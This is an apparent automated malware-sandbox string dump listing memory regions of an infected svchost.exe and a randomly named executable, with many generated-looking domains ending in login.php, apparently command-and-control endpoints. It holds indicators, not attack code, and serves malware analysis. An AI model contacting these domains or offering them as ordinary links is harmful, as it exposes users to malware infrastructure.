Source: svchost.exe, 00000002.00000003.1794341844.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792384862.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590845275.0000000000893000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694688622.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1589828940.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1589542688.000000000088E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvymul.com/
Source: svchost.exe, 00000002.00000003.1794341844.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792384862.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvymul.com/http://lyryled.com/http://lysyxux.com/0
Source: svchost.exe, 00000002.00000003.1794341844.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792384862.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvymul.com/http://puvymul.com/
Source: svchost.exe, 00000002.00000003.1580949078.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1791268726.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590381869.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582128544.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582064020.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582101693.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794886536.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1589646686.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794287273.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590695554.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591289289.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581589159.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1789782421.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590816328.000000000CC16000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
00000002.00000003.1599420800.0000000003305000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581749957.00000000032FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvymul.com/login.php
Source: svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvytag.com/
00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://qedyfyq.com/login.php
Source: svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedyhyl.com/ogin.php
Source: svchost.exe, 00000002.00000003.1657307465.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656485349.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902776073.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedykep.com/login.php
Source: svchost.exe, 00000002.00000003.1603267718.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1602887745.0000000003341000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1618370430.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1603168288.0000000003343000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1603383955.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1603167854.0000000003341000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1602885484.0000000003341000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1603227948.00000000008F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedykiv.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1658112964.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649079219.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649496281.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898508085.00000000033CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedylig.com/login.php
Source: svchost.exe, 00000002.00000003.1735890542.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1791268726.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1697918003.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1696068911.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1804173388.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2566051870.0000000003238000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565700959.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794886536.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1735230744.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794287273.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1731387306.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1824916487.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1735695137.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565184265.0000000003305000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1789782421.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1466997109.000000000335C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
00000002.00000003.1696189199.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839980751.000000000CC4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedynul.com/login.php
Source: svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2664551045.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795088390.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667325772.000000000CC12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2666830881.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694688622.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2707783889.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1793070832.0000000003339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedysov.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889082302.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1908769113.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1647696976.0000000003339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedytoq.com/login.php
Source: svchost.exe, 00000002.00000003.1681368942.000000000CC50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedyvap.com/login.php
Source: svchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedyxip.com/H
Source: svchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708330543.000000000CC5B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590381869.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582128544.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582064020.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582101693.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1589646686.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2660555457.000000000CC5B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2682843779.0000000000812000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590695554.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591289289.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581589159.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
00000002.00000003.1599420800.0000000003305000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581749957.00000000032FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedyxip.com/login.php
Source: svchost.exe, 00000002.00000003.1522565965.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604582055.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523100959.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2651524701.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523366703.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694688622.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743738473.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1738011948.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523355053.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604235819.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2651257908.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604481381.0000000003307000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qegyfyp.com/login.php
Source: svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qegyhev.com/
Source: svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693275657.0000000003343000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742037813.0000000005AF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1499147602.00000000008BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498635965.00000000008B5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469136296.0000000000888000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1499108924.000000000088C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2566811374.0000000005A52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.0000000009307000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.000000000127A000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 
00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.1989703593.000000000143B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qegyhig.com/login.php
Source: svchost.exe, 00000002.00000003.1661503631.000000000333D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1938865838.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916407909.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1939129904.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1665001861.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1940902998.000000000CC51000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1930763259.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664095073.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1911176076.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664828097.00000000033CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qegykeg.com/login.php
Source: svchost.exe, 00000002.00000003.1603267718.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1602887745.0000000003341000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1818670457.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1616687840.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617440304.0000000003343000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617424678.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1603168288.0000000003343000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1603167854.0000000003341000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1602885484.0000000003341000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1818581824.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qegylep.com/login.php
Source: svchost.exe, 00000002.00000003.1657307465.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656485349.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qegylul.com/login.php
Source: svchost.exe, 00000002.00000003.2560852053.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1690442076.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691406398.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2560976455.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900699978.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469750159.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2638530291.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475947519.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1803806662.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794566523.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898687726.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498514117.0000000003238000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2690115782.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1690742245.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080134372.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
00000002.00000003.1952895401.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2663281974.00000000008F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qegyqaq.com/login.php
Source: svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1633515874.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1630932773.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1623381188.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1630421381.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632737159.0000000003339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qegyqug.com/login.php
Source: svchost.exe, 00000002.00000003.1684842179.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1684848884.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1684994084.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1684344887.0000000003345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qegysiv.com/login.php
Source: svchost.exe, 00000002.00000003.1794341844.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792384862.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667325772.000000000CC12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2707783889.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qegysoq.com/
Source: svchost.exe, 00000002.00000003.1794341844.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792384862.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qegysoq.com/http://lysyxux.com/http://lysyxux.com/http://qekynuq.com/H
Source: svchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2660041223.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694910479.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590845275.0000000000893000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694688622.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2682843779.0000000000812000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661870675.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1589828940.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591143916.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1589542688.000000000088E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qegysoq.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1951119798.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1958180537.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558796542.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910878374.0000000005AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2663518628.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699805037.0000000005AF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639589869.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2638844020.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
00000002.00000003.1898508085.00000000033CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qegysyg.com/login.php
Source: svchost.exe, 00000002.00000003.1884602556.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889082302.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649496281.000000000CC4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qegytop.com/login.php
Source: svchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qegyval.com/http://purytyg.com/http://purytyg.com/http://qegyval.com/http://vocyjic.com/http:
Source: svchost.exe, 00000002.00000003.1876769792.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1951119798.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1958180537.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558796542.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910878374.0000000005AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2663518628.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1643374628.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699805037.0000000005AF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639589869.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878814703.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 